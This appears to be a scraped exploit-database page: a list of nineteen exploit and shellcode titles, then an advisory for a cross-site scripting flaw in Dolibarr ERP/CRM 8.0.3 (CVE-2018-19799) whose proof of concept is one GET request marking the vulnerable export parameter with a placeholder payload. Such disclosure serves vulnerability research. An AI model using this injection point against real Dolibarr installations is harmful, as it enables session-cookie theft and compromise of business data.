
19 changes to exploits/shellcodes Microsoft Lync for Mac 2011 - Injection Forced Browsing/Download Wireshark - 'cdma2k_message_ACTIVE_SET_RECORD_FIELDS' Stack Corruption Wireshark - 'find_signature' Heap Out-of-Bounds Read Xorg X11 Server (AIX) - Local Privilege Escalation Emacs - movemail Privilege Escalation (Metasploit) OpenSSH < 7.7 - User Enumeration (2) HP Intelligent Management - Java Deserialization RCE (Metasploit) Rockwell Automation Allen-Bradley PowerMonitor 1000 - Incorrect Access Control Authentication Bypass DomainMOD 4.11.01 - Owner name Field Cross-Site Scripting NEC Univerge Sv9100 WebPro - 6.00 - Predictable Session ID / Clear Text Password Storage KeyBase Botnet 1.5 - SQL Injection Dolibarr ERP/CRM 8.0.3 - Cross-Site Scripting DomainMOD 4.11.01 - Custom Domain Fields Cross-Site Scripting DomainMOD 4.11.01 - Custom SSL Fields Cross-Site Scripting NUUO NVRMini2 3.9.1 - Authenticated Command Injection DomainMOD 4.11.01 - Registrar Cross-Site Scripting FreshRSS 1.11.1 - Cross-Site Scripting Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes) Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes)
20 lines
No EOL
1 KiB
Text
20 lines
No EOL
1 KiB
Text
# Exploit Title: Dolibarr ERP/CRM <= 8.0.3 - Cross-Site Scripting
|
|
# CVE: CVE-2018-19799
|
|
# Date: 2018-11-23
|
|
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
|
|
# Contact: https://pentest.com.tr
|
|
# Vendor Homepage: https://dolibarr.org
|
|
# Software Link: http://sourceforge.net/projects/dolibarr/files/
|
|
# Version: v8.0.3
|
|
# Category: Webapps
|
|
# Tested on: XAMPP for Linux 7.2.8-0
|
|
# Software Description : Dolibarr ERP & CRM is a modern and easy to use software package to manage your business.
|
|
# (customers, invoices, orders, products, stocks, agenda, e-mailings, shipments...)
|
|
# Description : Exploiting these issues could allow an attacker to steal cookie-based authentication credentials,
|
|
# compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
# Dolibarr 8.0.3 is vulnerable; prior versions may also be affected.
|
|
# ==================================================================
|
|
|
|
# PoC:
|
|
|
|
# GET Request : /exports/export.php?step=2&datatoexport=[XSS PAYLOAD]&action=selectfield&field=pj.ref&page_y=627 |